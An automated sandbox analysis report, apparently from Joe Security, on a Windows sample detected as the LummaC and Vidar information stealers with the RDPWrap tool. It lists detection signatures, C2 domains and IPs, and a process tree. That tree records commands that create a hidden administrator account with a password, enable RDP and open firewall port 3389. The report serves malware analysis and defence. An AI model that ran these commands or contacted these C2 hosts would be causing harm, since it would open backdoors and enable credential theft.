Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519759
MD5:	f73186df5a030cf7f186b0737c3af1f7
SHA1:	d15e45feefbbc010db92ae897d80bc7419c0d046
SHA256:	05c67a9765fe1ebebcedaee376f87a803d7cd37e6c5c19f7d336c2f14a4ef207
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, RDPWrap Tool, LummaC Stealer, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains potential unpacker

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a new user with administrator rights

Allocates memory in foreign processes

Allows multiple concurrent remote connection

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Enables remote desktop connection

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Modifies the windows firewall

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Sigma detected: RDP Sensitive Settings Changed

Sigma detected: Suspicious Add User to Remote Desktop Users Group

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected RDPWrap Tool

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: New User Created Via Net.EXE

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 4108 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F73186DF5A030CF7F186B0737C3AF1F7)

conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

IDBAFHDGDG.exe (PID: 6044 cmdline: "C:\ProgramData\IDBAFHDGDG.exe" MD5: 47697A60A96C5ADEF362D8DA9A274B7D)

conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 1220 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

GIIIIJDHJE.exe (PID: 3652 cmdline: "C:\ProgramData\GIIIIJDHJE.exe" MD5: F73186DF5A030CF7F186B0737C3AF1F7)

conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 1144 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

AFHDGDGIID.exe (PID: 3396 cmdline: "C:\ProgramData\AFHDGDGIID.exe" MD5: 8C46913FBA5CA6A0CB8C4E839EF3A3AE)

cmd.exe (PID: 1312 cmdline: "cmd.exe" /c net user MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 6608 cmdline: net user MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 6744 cmdline: C:\Windows\system32\net1 user MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 6504 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RDPWInst.exe (PID: 3168 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)

netsh.exe (PID: 3524 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 5416 cmdline: "cmd.exe" /c net user RDPUser_fec8106a DlRcmVQWc0I6 /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 1620 cmdline: net user RDPUser_fec8106a DlRcmVQWc0I6 /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 6008 cmdline: C:\Windows\system32\net1 user RDPUser_fec8106a DlRcmVQWc0I6 /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 2032 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 5076 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 5568 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 3488 cmdline: "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 6244 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cmd.exe (PID: 6464 cmdline: "cmd.exe" /c net localgroup "Administrators" RDPUser_fec8106a /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 6476 cmdline: net localgroup "Administrators" RDPUser_fec8106a /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 6488 cmdline: C:\Windows\system32\net1 localgroup "Administrators" RDPUser_fec8106a /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 6644 cmdline: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_fec8106a /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 6804 cmdline: net localgroup "Remote Desktop Users" RDPUser_fec8106a /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 6856 cmdline: C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_fec8106a /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 932 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFBKFHIDHIIJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 3284 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

rdpvideominiport.sys (PID: 4 cmdline: MD5: 77FF15B9237D62A5CBC6C80E5B20A492)

rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)

tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["ghostreedmnu.shop", "wallkedsleeoi.shop", "stogeneratmns.shop", "fragnantbui.shop", "reinforcenh.shop", "gutterydhowi.shop", "drawzhotdog.shop", "offensivedzvju.shop", "vozmeatillu.shop"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e90840a846d017e7b095f7543cdf2d15"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\AFHDGDGIID.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000000.2436607215.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000013.00000002.2487557862.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
00000013.00000000.2436777725.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 4108	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 4108	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 4108	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 396	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 396	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 396	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 396	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 1144	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1144	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AFHDGDGIID.exe PID: 3396	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RDPWInst.exe PID: 3168	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.RegAsm.exe.400000.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.RegAsm.exe.400000.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
8.2.RegAsm.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
8.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.RegAsm.exe.400000.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.RegAsm.exe.400000.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.3d45570.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.3d45570.0.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
12.0.AFHDGDGIID.exe.b90000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.file.exe.3d45570.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.3d45570.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
19.0.RDPWInst.exe.400000.0.unpack	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
19.0.RDPWInst.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
19.2.RDPWInst.exe.400000.0.unpack	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
19.2.RDPWInst.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Source: Network Connection

Author: Markus Neis: Data: DestinationIp: 8.46.123.33, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\ProgramData\AFHDGDGIID.exe, Initiated: true, ProcessId: 3396, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49784

Sigma detected: RDP Sensitive Settings Changed

Source: Registry Key set

Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 3168, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll

Sigma detected: Suspicious Add User to Remote Desktop Users Group

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_fec8106a /add, CommandLine: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_fec8106a /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\ProgramData\AFHDGDGIID.exe" , ParentImage: C:\ProgramData\AFHDGDGIID.exe, ParentProcessId: 3396, ParentProcessName: AFHDGDGIID.exe, ProcessCommandLine: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_fec8106a /add, ProcessId: 6644, ProcessName: cmd.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys

Sigma detected: New User Created Via Net.EXE

Source: Process started

Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user RDPUser_fec8106a DlRcmVQWc0I6 /add, CommandLine: net user RDPUser_fec8106a DlRcmVQWc0I6 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user RDPUser_fec8106a DlRcmVQWc0I6 /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5416, ParentProcessName: cmd.exe, ProcessCommandLine: net user RDPUser_fec8106a DlRcmVQWc0I6 /add, ProcessId: 1620, ProcessName: net.exe

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\ProgramData\AFHDGDGIID.exe, QueryName: api.ipify.org

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1312, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6608, ProcessName: net.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1312, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6608, ProcessName: net.exe

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:14:28.857369+0200	2028765	3	Unknown Traffic	192.168.2.4	49740	5.75.211.162	443	TCP
2024-09-27T00:14:30.047301+0200	2028765	3	Unknown Traffic	192.168.2.4	49741	5.75.211.162	443	TCP
2024-09-27T00:14:31.424414+0200	2028765	3	Unknown Traffic	192.168.2.4	49742	5.75.211.162	443	TCP
2024-09-27T00:14:32.792950+0200	2028765	3	Unknown Traffic	192.168.2.4	49743	5.75.211.162	443	TCP
2024-09-27T00:14:34.149527+0200	2028765	3	Unknown Traffic	192.168.2.4	49744	5.75.211.162	443	TCP
2024-09-27T00:14:35.562421+0200	2028765	3	Unknown Traffic	192.168.2.4	49745	5.75.211.162	443	TCP
2024-09-27T00:14:36.581589+0200	2028765	3	Unknown Traffic	192.168.2.4	49746	5.75.211.162	443	TCP
2024-09-27T00:14:39.706116+0200	2028765	3	Unknown Traffic	192.168.2.4	49747	5.75.211.162	443	TCP
2024-09-27T00:14:40.918817+0200	2028765	3	Unknown Traffic	192.168.2.4	49748	5.75.211.162	443	TCP
2024-09-27T00:14:41.930442+0200	2028765	3	Unknown Traffic	192.168.2.4	49749	5.75.211.162	443	TCP
2024-09-27T00:14:43.074730+0200	2028765	3	Unknown Traffic	192.168.2.4	49750	5.75.211.162	443	TCP
2024-09-27T00:14:44.107022+0200	2028765	3	Unknown Traffic	192.168.2.4	49751	5.75.211.162	443	TCP
2024-09-27T00:14:45.825014+0200	2028765	3	Unknown Traffic	192.168.2.4	49752	5.75.211.162	443	TCP
2024-09-27T00:14:47.539254+0200	2028765	3	Unknown Traffic	192.168.2.4	49753	5.75.211.162	443	TCP
2024-09-27T00:14:49.077562+0200	2028765	3	Unknown Traffic	192.168.2.4	49754	5.75.211.162	443	TCP
2024-09-27T00:14:50.619616+0200	2028765	3	Unknown Traffic	192.168.2.4	49755	5.75.211.162	443	TCP
2024-09-27T00:14:52.789705+0200	2028765	3	Unknown Traffic	192.168.2.4	49756	5.75.211.162	443	TCP
2024-09-27T00:14:55.766830+0200	2028765	3	Unknown Traffic	192.168.2.4	49757	5.75.211.162	443	TCP
2024-09-27T00:14:56.945373+0200	2028765	3	Unknown Traffic	192.168.2.4	49758	5.75.211.162	443	TCP
2024-09-27T00:14:58.287500+0200	2028765	3	Unknown Traffic	192.168.2.4	49759	5.75.211.162	443	TCP
2024-09-27T00:14:59.736675+0200	2028765	3	Unknown Traffic	192.168.2.4	49760	5.75.211.162	443	TCP
2024-09-27T00:15:01.765713+0200	2028765	3	Unknown Traffic	192.168.2.4	49762	5.75.211.162	443	TCP
2024-09-27T00:15:03.802303+0200	2028765	3	Unknown Traffic	192.168.2.4	49763	5.75.211.162	443	TCP
2024-09-27T00:15:07.750779+0200	2028765	3	Unknown Traffic	192.168.2.4	49765	5.75.211.162	443	TCP
2024-09-27T00:15:09.941873+0200	2028765	3	Unknown Traffic	192.168.2.4	49769	5.75.211.162	443	TCP
2024-09-27T00:15:12.068341+0200	2028765	3	Unknown Traffic	192.168.2.4	49772	5.75.211.162	443	TCP
2024-09-27T00:15:13.690540+0200	2028765	3	Unknown Traffic	192.168.2.4	49775	5.75.211.162	443	TCP
2024-09-27T00:15:41.429971+0200	2028765	3	Unknown Traffic	192.168.2.4	49787	5.75.211.162	443	TCP
2024-09-27T00:15:42.919658+0200	2028765	3	Unknown Traffic	192.168.2.4	49788	5.75.211.162	443	TCP
2024-09-27T00:15:44.282336+0200	2028765	3	Unknown Traffic	192.168.2.4	49789	5.75.211.162	443	TCP
2024-09-27T00:15:45.645028+0200	2028765	3	Unknown Traffic	192.168.2.4	49790	5.75.211.162	443	TCP
2024-09-27T00:15:46.991366+0200	2028765	3	Unknown Traffic	192.168.2.4	49791	5.75.211.162	443	TCP
2024-09-27T00:15:48.434558+0200	2028765	3	Unknown Traffic	192.168.2.4	49792	5.75.211.162	443	TCP
2024-09-27T00:15:49.449684+0200	2028765	3	Unknown Traffic	192.168.2.4	49793	5.75.211.162	443	TCP
2024-09-27T00:15:52.774428+0200	2028765	3	Unknown Traffic	192.168.2.4	49794	5.75.211.162	443	TCP
2024-09-27T00:15:53.759540+0200	2028765	3	Unknown Traffic	192.168.2.4	49795	5.75.211.162	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:08.133125+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49766	104.21.36.139	443	TCP
2024-09-27T00:15:09.096642+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49767	104.21.4.136	443	TCP
2024-09-27T00:15:10.034198+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49768	188.114.97.3	443	TCP
2024-09-27T00:15:11.283870+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49770	188.114.96.3	443	TCP
2024-09-27T00:15:12.490926+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49771	188.114.97.3	443	TCP
2024-09-27T00:15:13.438318+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49773	172.67.162.108	443	TCP
2024-09-27T00:15:14.346648+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49776	188.114.96.3	443	TCP
2024-09-27T00:15:16.089236+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49777	188.114.97.3	443	TCP
2024-09-27T00:15:18.168845+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49779	172.67.208.139	443	TCP
2024-09-27T00:15:20.558599+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49781	172.67.128.144	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:08.133125+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49766	104.21.36.139	443	TCP
2024-09-27T00:15:09.096642+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49767	104.21.4.136	443	TCP
2024-09-27T00:15:10.034198+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49768	188.114.97.3	443	TCP
2024-09-27T00:15:11.283870+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49770	188.114.96.3	443	TCP
